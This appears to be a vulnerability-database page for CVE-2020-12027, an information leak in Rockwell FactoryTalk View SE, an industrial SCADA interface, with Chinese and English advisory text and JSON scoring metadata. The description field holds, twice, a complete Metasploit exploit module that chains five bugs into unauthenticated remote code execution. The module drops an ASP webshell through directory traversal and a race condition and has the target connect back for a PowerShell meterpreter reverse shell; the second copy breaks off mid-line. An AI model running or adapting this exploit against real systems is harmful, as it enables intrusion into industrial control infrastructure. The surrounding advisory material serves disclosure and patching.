Vulnerability from cnvd - Published: 2020-07-13

Title

Rockwell Automation FactoryTalk View SE信息泄露漏洞

Description

Rockwell Automation FactoryTalk View SE是美国罗克韦尔（Rockwell Automation）公司的一款工业自动化系统视图界面。 Rockwell Automation FactoryTalk View SE中存在信息泄露漏洞。该漏洞源于网络系统或产品在运行过程中存在配置等错误。未授权的攻击者可利用漏洞获取受影响组件敏感信息。

Severity

中

Patch Name

Rockwell Automation FactoryTalk View SE信息泄露漏洞的补丁

Patch Description

Formal description

厂商已发布了漏洞修复程序，请及时关注更新： https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944

Reference

https://www.us-cert.gov/ics/advisories/icsa-20-170-05

Impacted products

Name
Rockwell Automation FactoryTalk View SE

Show details on source website

JSON

To clipboard

{
  "cves": {
    "cve": {
      "cveNumber": "CVE-2020-12027"
    }
  },
  "description": "Rockwell Automation FactoryTalk View SE\u662f\u7f8e\u56fd\u7f57\u514b\u97e6\u5c14\uff08Rockwell Automation\uff09\u516c\u53f8\u7684\u4e00\u6b3e\u5de5\u4e1a\u81ea\u52a8\u5316\u7cfb\u7edf\u89c6\u56fe\u754c\u9762\u3002\n\nRockwell Automation FactoryTalk View SE\u4e2d\u5b58\u5728\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e\u3002\u8be5\u6f0f\u6d1e\u6e90\u4e8e\u7f51\u7edc\u7cfb\u7edf\u6216\u4ea7\u54c1\u5728\u8fd0\u884c\u8fc7\u7a0b\u4e2d\u5b58\u5728\u914d\u7f6e\u7b49\u9519\u8bef\u3002\u672a\u6388\u6743\u7684\u653b\u51fb\u8005\u53ef\u5229\u7528\u6f0f\u6d1e\u83b7\u53d6\u53d7\u5f71\u54cd\u7ec4\u4ef6\u654f\u611f\u4fe1\u606f\u3002",
  "formalWay": "\u5382\u5546\u5df2\u53d1\u5e03\u4e86\u6f0f\u6d1e\u4fee\u590d\u7a0b\u5e8f\uff0c\u8bf7\u53ca\u65f6\u5173\u6ce8\u66f4\u65b0\uff1a\r\nhttps://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944",
  "isEvent": "\u901a\u7528\u8f6f\u786c\u4ef6\u6f0f\u6d1e",
  "number": "CNVD-2020-38419",
  "openTime": "2020-07-13",
  "patchDescription": "Rockwell Automation FactoryTalk View SE\u662f\u7f8e\u56fd\u7f57\u514b\u97e6\u5c14\uff08Rockwell Automation\uff09\u516c\u53f8\u7684\u4e00\u6b3e\u5de5\u4e1a\u81ea\u52a8\u5316\u7cfb\u7edf\u89c6\u56fe\u754c\u9762\u3002\r\n\r\nRockwell Automation FactoryTalk View SE\u4e2d\u5b58\u5728\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e\u3002\u8be5\u6f0f\u6d1e\u6e90\u4e8e\u7f51\u7edc\u7cfb\u7edf\u6216\u4ea7\u54c1\u5728\u8fd0\u884c\u8fc7\u7a0b\u4e2d\u5b58\u5728\u914d\u7f6e\u7b49\u9519\u8bef\u3002\u672a\u6388\u6743\u7684\u653b\u51fb\u8005\u53ef\u5229\u7528\u6f0f\u6d1e\u83b7\u53d6\u53d7\u5f71\u54cd\u7ec4\u4ef6\u654f\u611f\u4fe1\u606f\u3002\u76ee\u524d\uff0c\u4f9b\u5e94\u5546\u53d1\u5e03\u4e86\u5b89\u5168\u516c\u544a\u53ca\u76f8\u5173\u8865\u4e01\u4fe1\u606f\uff0c\u4fee\u590d\u4e86\u6b64\u6f0f\u6d1e\u3002",
  "patchName": "Rockwell Automation FactoryTalk View SE\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e\u7684\u8865\u4e01",
  "products": {
    "product": "Rockwell Automation FactoryTalk View SE"
  },
  "referenceLink": "https://www.us-cert.gov/ics/advisories/icsa-20-170-05",
  "serverity": "\u4e2d",
  "submitTime": "2020-06-19",
  "title": "Rockwell Automation FactoryTalk View SE\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e"
}

VAR-202007-0193

Vulnerability from variot - Updated: 2023-12-18 12:49

All versions of FactoryTalk View SE disclose the hostnames and file paths for certain files within the system. A remote, authenticated attacker may be able to leverage this information for reconnaissance efforts. Rockwell Automation recommends enabling built in security features found within FactoryTalk View SE. Users should follow guidance found in knowledge base articles 109056 and 1126943 to set up IPSec and/or HTTPs. FactoryTalk View SE There is an information leakage vulnerability in.Information may be obtained. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of the GetHMIProjects parameter provided to hmi_isapi.dll. The issue results from a lack of authentication required to query the server. An attacker can leverage this in conjunction with other vulnerability to execute code in the context of SYSTEM. The vulnerability stems from network system or product configuration errors during operation. ##

This module requires Metasploit: https://metasploit.com/download

Current source: https://github.com/rapid7/metasploit-framework

class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking

include Msf::Exploit::Powershell include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HttpClient

def initialize(info = {}) super( update_info( info, 'Name' => 'Rockwell FactoryTalk View SE SCADA Unauthenticated Remote Code Execution', 'Description' => %q{ This module exploits a series of vulnerabilities to achieve unauthenticated remote code execution on the Rockwell FactoryTalk View SE SCADA product as the IIS user. The attack relies on the chaining of five separate vulnerabilities. The first vulnerability is an unauthenticated project copy request, the second is a directory traversal, and the third is a race condition. In order to achieve full remote code execution on all targets, two information leak vulnerabilities are also abused. This exploit was used by the Flashback team (Pedro Ribeiro + Radek Domanski) in Pwn2Own Miami 2020 to win the EWS category. }, 'License' => MSF_LICENSE, 'Author' => [ 'Pedro Ribeiro ', # Vulnerability discovery and Metasploit module 'Radek Domanski ' # Vulnerability discovery and Metasploit module ], 'References' => [ [ 'URL', 'https://www.thezdi.com/blog/2020/7/22/chaining-5-bugs-for-code-execution-on-the-rockwell-factorytalk-hmi-at-pwn2own-miami'], [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Miami_2020/replicant/replicant.md'], [ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/tree/master/advisories/Pwn2Own/Miami2020/replicant.md'], [ 'CVE', '2020-12027'], [ 'CVE', '2020-12028'], [ 'CVE', '2020-12029'], [ 'ZDI', '20-727'], [ 'ZDI', '20-728'], [ 'ZDI', '20-729'], [ 'ZDI', '20-730'], ], 'Privileged' => false, 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Payload' => { 'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' } }, 'DefaultOptions' => { 'WfsDelay' => 20 }, 'Targets' => [ [ 'Rockwell Automation FactoryTalk SE', {} ] ], 'DisclosureDate' => '2020-06-22', 'DefaultTarget' => 0 ) ) register_options( [ Opt::RPORT(80), OptString.new('SRVHOST', [true, 'IP address of the host serving the exploit']), OptInt.new('SRVPORT', [true, 'Port of the host serving the exploit on', 8080]), OptString.new('TARGETURI', [true, 'The base path to Rockwell FactoryTalk', '/rsviewse/']) ] )

register_advanced_options(
  [
    OptInt.new('SLEEP_RACER', [true, 'Number of seconds to wait for racer thread to finish', 15]),
  ]
)

end

def send_to_factory(path) send_request_cgi({ 'uri' => normalize_uri(target_uri, path), 'method' => 'GET' }) end

def check res = send_to_factory('/hmi_isapi.dll') return Exploit::CheckCode::Safe unless res && res.code == 200

# Parse version from response body
# Example: Version 11.00.00.230
version = res.body.scan(/Version ([0-9\.]{5,})/).flatten.first.to_s.split('.')

# Is returned version sound?
unless version.empty?
  if version.length != 4
    return Exploit::CheckCode::Detected
  end

  print_status("#{peer} - Detected Rockwell FactoryTalk View SE SCADA version #{version[0..3].join('.')}")
  if version[0].to_i == 11 && version[1].to_i == 0 && version[2].to_i == 0 && version[3].to_i == 230
    # we know this exact version is vulnerable (11.00.00.230)
    return Exploit::CheckCode::Appears
  end

  return Exploit::CheckCode::Detected
end

return Exploit::CheckCode::Unknown

end

def on_request_uri(cli, request) if request.uri.include?(@shelly) print_good("#{peer} - Target connected, sending payload") psh = cmd_psh_payload( payload.encoded, payload.arch.first # without comspec it seems to fail, so keep it this way # remove_comspec: true ) # add double quotes for classic ASP escaping psh.gsub!('"', '""')

  # NOTE: ASP payloads are broken in newer Windows (Win 2012 R2, Win 10) so we need to use powershell
  # This is because the MSF ASP payload uses WScript.Shell.run(), which doesn't seem to work anymore... 
  # If this module is not working on an older Windows version, try the below as payload:
  # payload = Msf::Util::EXE.to_exe_asp(generate_payload_exe)
  payload = %{<%CreateObject("WScript.Shell").exec("#{psh}")%>}
  send_response(cli, payload)
  # payload file is deleted automatically by the server once we win the race!

elsif request.uri.include?(@proj_name)
  # Directory traversal: vulnerable asp file will land in the path we provide
  print_good("#{peer} - Target connected, sending file path with dir traversal")
  # Check the comments in the Infoleak 2 (project installation path) to understand why
  filename = "../SE/HMI Projects/#{@shelly}"
  send_response(cli, filename)
end

end

def exploit # Infoleak 1 (project listing) print_status("#{peer} - Listing projects on the server") res = send_to_factory('/hmi_isapi.dll?GetHMIProjects')

fail_with(Failure::UnexpectedReply, 'Failed to obtain project list. Bailing') unless
  res && res.code == 200 && res.body.include?('HMIProject')

print_status("#{peer} - Received list of projects from the server")
@proj_name = nil
proj_path = ''
xml = res.get_xml_document

# Parse XML project list and check each project for installation project path
xml.search('HMIProject').each do |project|
  # Infoleak 2 (project installation path)
  # In the original exploit, we used this to calculate the directory traversal path, but
  # Google says the path is the same for all versions since at least 2007. 
  # Let's still abuse it to check if the project is valid. 
  url = "/hmi_isapi.dll?GetHMIProjectPath&#{project.attributes['Name']}"
  res = send_to_factory(url)

  proj_path = res.body.strip

  # Check if response contains :\ that indicates a windows path
  next unless proj_path.include?(':\\')

  print_status("#{peer} - Found project path: #{proj_path}")

  # We only need first hit so we can quit the project parsing once we get it
  if project.attributes['Name']
    @proj_name = project.attributes['Name']
    break
  end
end

if !@proj_name
  fail_with(Failure::UnexpectedReply, 'Failed to get a path from the XML to drop our shell, bailing out...')
end

shell_path = proj_path.sub(@proj_name, '').strip
print_good("#{peer} - Got a path to drop our shell: #{shell_path}")

# Start http server for project copy callback
http_service = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s
print_status("#{peer} - Starting up our web service on #{http_service} ...")

start_service({ 'Uri' => {
  'Proc' => proc do |cli, req|
    on_request_uri(cli, req)
  end,
  # This path has to be capitalized as "RSViewSE" or else the exploit will fail!
  'Path' => '/RSViewSE/'
} })

# Race Condition
# This is the racer thread. It will continuously access our asp file until it gets executed
print_status("#{peer} - Starting racer thread, let's win this race condition!")
@shelly = "#{rand_text_alpha(5..10)}.asp"
racer = Thread.new do
  loop do
    res = send_to_factory("/#{@shelly}")
    if res.code == 200
      print_good("#{peer} - We've won the race condition, shell incoming!")
      break
    end
  end
end

# Project Copy Request: target will connect to us to obtain project information. 
print_status("#{peer} - Initiating project copy request...")
url = "/hmi_isapi.dll?StartRemoteProjectCopy&#{@proj_name}&#{rand_text_alpha(5..13)}&#{datastore['SRVHOST']}:#{datastore['SRVPORT']}&1"
res = send_to_factory(url)

# wait up to datastore['SLEEP_RACER'] seconds for the racer thread to finish
count = 0
while count < datastore['SLEEP_RACER']
  break if racer.status == false

  sleep(1)
  count += 1
end
racer.exit

end end

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202007-0193",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "factorytalk view se",
        "scope": null,
        "trust": 1.4,
        "vendor": "rockwell automation",
        "version": null
      },
      {
        "model": "factorytalk view",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "rockwellautomation",
        "version": "*"
      },
      {
        "model": "factorytalk view",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "rockwell automation",
        "version": "se"
      },
      {
        "model": "studio 5000",
        "scope": null,
        "trust": 0.7,
        "vendor": "rockwell automation",
        "version": null
      },
      {
        "model": "automation factorytalk view se",
        "scope": null,
        "trust": 0.6,
        "vendor": "rockwell",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-20-732"
      },
      {
        "db": "ZDI",
        "id": "ZDI-20-728"
      },
      {
        "db": "ZDI",
        "id": "ZDI-20-727"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-38419"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-008252"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-12027"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:rockwellautomation:factorytalk_view:*:*:*:*:se:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-12027"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Team FLASHBACK: Pedro Ribeiro (pedrib@gmail.com|@pedrib1337) and Radek  Domanski (@RabbitPro)",
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-20-728"
      },
      {
        "db": "ZDI",
        "id": "ZDI-20-727"
      }
    ],
    "trust": 1.4
  },
  "cve": "CVE-2020-12027",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.0,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "Single",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 4.0,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "JVNDB-2020-008252",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2020-38419",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 4.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.0,
            "id": "VHN-164664",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:S/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "ZDI",
            "availabilityImpact": "NONE",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "exploitabilityScore": 3.9,
            "id": "CVE-2020-12027",
            "impactScore": 1.4,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 2.1,
            "userInteraction": "NONE",
            "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "version": "3.0"
          },
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "exploitabilityScore": 2.8,
            "impactScore": 1.4,
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 2.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 4.3,
            "baseSeverity": "Medium",
            "confidentialityImpact": "Low",
            "exploitabilityScore": null,
            "id": "JVNDB-2020-008252",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "ZDI",
            "id": "CVE-2020-12027",
            "trust": 2.1,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "CVE-2020-12027",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "ics-cert@hq.dhs.gov",
            "id": "CVE-2020-12027",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "JVNDB-2020-008252",
            "trust": 0.8,
            "value": "Medium"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2020-38419",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202006-1216",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-164664",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-20-732"
      },
      {
        "db": "ZDI",
        "id": "ZDI-20-728"
      },
      {
        "db": "ZDI",
        "id": "ZDI-20-727"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-38419"
      },
      {
        "db": "VULHUB",
        "id": "VHN-164664"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-008252"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-12027"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-12027"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-1216"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "All versions of FactoryTalk View SE disclose the hostnames and file paths for certain files within the system. A remote, authenticated attacker may be able to leverage this information for reconnaissance efforts. Rockwell Automation recommends enabling built in security features found within FactoryTalk View SE. Users should follow guidance found in knowledge base articles 109056 and 1126943 to set up IPSec and/or HTTPs. FactoryTalk View SE There is an information leakage vulnerability in.Information may be obtained. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of the GetHMIProjects parameter provided to hmi_isapi.dll. The issue results from a lack of authentication required to query the server. An attacker can leverage this in conjunction with other vulnerability to execute code in the context of SYSTEM. The vulnerability stems from network system or product configuration errors during operation. ##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n  Rank = ExcellentRanking\n\n  include Msf::Exploit::Powershell\n  include Msf::Exploit::Remote::HttpServer\n  include Msf::Exploit::Remote::HttpClient\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        \u0027Name\u0027 =\u003e \u0027Rockwell FactoryTalk View SE SCADA Unauthenticated Remote Code Execution\u0027,\n        \u0027Description\u0027 =\u003e %q{\n          This module exploits a series of vulnerabilities to achieve unauthenticated remote code execution\n          on the Rockwell FactoryTalk View SE SCADA product as the IIS user. \n          The attack relies on the chaining of five separate vulnerabilities. The first vulnerability is an unauthenticated project copy request,\n          the second is a directory traversal, and the third is a race condition. In order to achieve full remote code execution on all\n          targets, two information leak vulnerabilities are also abused. \n          This exploit was used by the Flashback team (Pedro Ribeiro + Radek Domanski) in Pwn2Own Miami 2020 to win the EWS category. \n        },\n        \u0027License\u0027 =\u003e MSF_LICENSE,\n        \u0027Author\u0027 =\u003e\n        [\n          \u0027Pedro Ribeiro \u003cpedrib[at]gmail.com\u003e\u0027, # Vulnerability discovery and Metasploit module\n          \u0027Radek Domanski \u003cradek.domanski[at]gmail.com\u003e\u0027 # Vulnerability discovery and Metasploit module\n        ],\n        \u0027References\u0027 =\u003e\n          [\n            [ \u0027URL\u0027, \u0027https://www.thezdi.com/blog/2020/7/22/chaining-5-bugs-for-code-execution-on-the-rockwell-factorytalk-hmi-at-pwn2own-miami\u0027],\n            [ \u0027URL\u0027, \u0027https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Miami_2020/replicant/replicant.md\u0027],\n            [ \u0027URL\u0027, \u0027https://github.com/rdomanski/Exploits_and_Advisories/tree/master/advisories/Pwn2Own/Miami2020/replicant.md\u0027],\n            [ \u0027CVE\u0027, \u00272020-12027\u0027],\n            [ \u0027CVE\u0027, \u00272020-12028\u0027],\n            [ \u0027CVE\u0027, \u00272020-12029\u0027],\n            [ \u0027ZDI\u0027, \u002720-727\u0027],\n            [ \u0027ZDI\u0027, \u002720-728\u0027],\n            [ \u0027ZDI\u0027, \u002720-729\u0027],\n            [ \u0027ZDI\u0027, \u002720-730\u0027],\n          ],\n        \u0027Privileged\u0027 =\u003e false,\n        \u0027Platform\u0027 =\u003e \u0027win\u0027,\n        \u0027Arch\u0027 =\u003e [ARCH_X86, ARCH_X64],\n        \u0027Stance\u0027 =\u003e Msf::Exploit::Stance::Aggressive,\n        \u0027Payload\u0027 =\u003e {\n          \u0027DefaultOptions\u0027 =\u003e\n            {\n              \u0027PAYLOAD\u0027 =\u003e \u0027windows/meterpreter/reverse_tcp\u0027\n            }\n        },\n        \u0027DefaultOptions\u0027 =\u003e { \u0027WfsDelay\u0027 =\u003e 20 },\n        \u0027Targets\u0027 =\u003e\n          [\n            [ \u0027Rockwell Automation FactoryTalk SE\u0027, {} ]\n          ],\n        \u0027DisclosureDate\u0027 =\u003e \u00272020-06-22\u0027,\n        \u0027DefaultTarget\u0027 =\u003e 0\n      )\n    )\n    register_options(\n      [\n        Opt::RPORT(80),\n        OptString.new(\u0027SRVHOST\u0027, [true, \u0027IP address of the host serving the exploit\u0027]),\n        OptInt.new(\u0027SRVPORT\u0027, [true, \u0027Port of the host serving the exploit on\u0027, 8080]),\n        OptString.new(\u0027TARGETURI\u0027, [true, \u0027The base path to Rockwell FactoryTalk\u0027, \u0027/rsviewse/\u0027])\n      ]\n    )\n\n    register_advanced_options(\n      [\n        OptInt.new(\u0027SLEEP_RACER\u0027, [true, \u0027Number of seconds to wait for racer thread to finish\u0027, 15]),\n      ]\n    )\n  end\n\n  def send_to_factory(path)\n    send_request_cgi({\n      \u0027uri\u0027 =\u003e normalize_uri(target_uri, path),\n      \u0027method\u0027 =\u003e \u0027GET\u0027\n    })\n  end\n\n  def check\n    res = send_to_factory(\u0027/hmi_isapi.dll\u0027)\n    return Exploit::CheckCode::Safe unless res \u0026\u0026 res.code == 200\n\n    # Parse version from response body\n    # Example: Version 11.00.00.230\n    version = res.body.scan(/Version ([0-9\\.]{5,})/).flatten.first.to_s.split(\u0027.\u0027)\n\n    # Is returned version sound?\n    unless version.empty?\n      if version.length != 4\n        return Exploit::CheckCode::Detected\n      end\n\n      print_status(\"#{peer} - Detected Rockwell FactoryTalk View SE SCADA version #{version[0..3].join(\u0027.\u0027)}\")\n      if version[0].to_i == 11 \u0026\u0026 version[1].to_i == 0 \u0026\u0026 version[2].to_i == 0 \u0026\u0026 version[3].to_i == 230\n        # we know this exact version is vulnerable (11.00.00.230)\n        return Exploit::CheckCode::Appears\n      end\n\n      return Exploit::CheckCode::Detected\n    end\n\n    return Exploit::CheckCode::Unknown\n  end\n\n  def on_request_uri(cli, request)\n    if request.uri.include?(@shelly)\n      print_good(\"#{peer} - Target connected, sending payload\")\n      psh = cmd_psh_payload(\n        payload.encoded,\n        payload.arch.first\n        # without comspec it seems to fail, so keep it this way\n        # remove_comspec: true\n      )\n      # add double quotes for classic ASP escaping\n      psh.gsub!(\u0027\"\u0027, \u0027\"\"\u0027)\n\n      # NOTE: ASP payloads are broken in newer Windows (Win 2012 R2, Win 10) so we need to use powershell\n      # This is because the MSF ASP payload uses WScript.Shell.run(), which doesn\u0027t seem to work anymore... \n      # If this module is not working on an older Windows version, try the below as payload:\n      # payload = Msf::Util::EXE.to_exe_asp(generate_payload_exe)\n      payload = %{\u003c%CreateObject(\"WScript.Shell\").exec(\"#{psh}\")%\u003e}\n      send_response(cli, payload)\n      # payload file is deleted automatically by the server once we win the race!\n\n    elsif request.uri.include?(@proj_name)\n      # Directory traversal: vulnerable asp file will land in the path we provide\n      print_good(\"#{peer} - Target connected, sending file path with dir traversal\")\n      # Check the comments in the Infoleak 2 (project installation path) to understand why\n      filename = \"../SE/HMI Projects/#{@shelly}\"\n      send_response(cli, filename)\n    end\n  end\n\n  def exploit\n    # Infoleak 1 (project listing)\n    print_status(\"#{peer} - Listing projects on the server\")\n    res = send_to_factory(\u0027/hmi_isapi.dll?GetHMIProjects\u0027)\n\n    fail_with(Failure::UnexpectedReply, \u0027Failed to obtain project list. Bailing\u0027) unless\n      res \u0026\u0026 res.code == 200 \u0026\u0026 res.body.include?(\u0027HMIProject\u0027)\n\n    print_status(\"#{peer} - Received list of projects from the server\")\n    @proj_name = nil\n    proj_path = \u0027\u0027\n    xml = res.get_xml_document\n\n    # Parse XML project list and check each project for installation project path\n    xml.search(\u0027HMIProject\u0027).each do |project|\n      # Infoleak 2 (project installation path)\n      # In the original exploit, we used this to calculate the directory traversal path, but\n      # Google says the path is the same for all versions since at least 2007. \n      # Let\u0027s still abuse it to check if the project is valid. \n      url = \"/hmi_isapi.dll?GetHMIProjectPath\u0026#{project.attributes[\u0027Name\u0027]}\"\n      res = send_to_factory(url)\n\n      proj_path = res.body.strip\n\n      # Check if response contains :\\ that indicates a windows path\n      next unless proj_path.include?(\u0027:\\\\\u0027)\n\n      print_status(\"#{peer} - Found project path: #{proj_path}\")\n\n      # We only need first hit so we can quit the project parsing once we get it\n      if project.attributes[\u0027Name\u0027]\n        @proj_name = project.attributes[\u0027Name\u0027]\n        break\n      end\n    end\n\n    if !@proj_name\n      fail_with(Failure::UnexpectedReply, \u0027Failed to get a path from the XML to drop our shell, bailing out...\u0027)\n    end\n\n    shell_path = proj_path.sub(@proj_name, 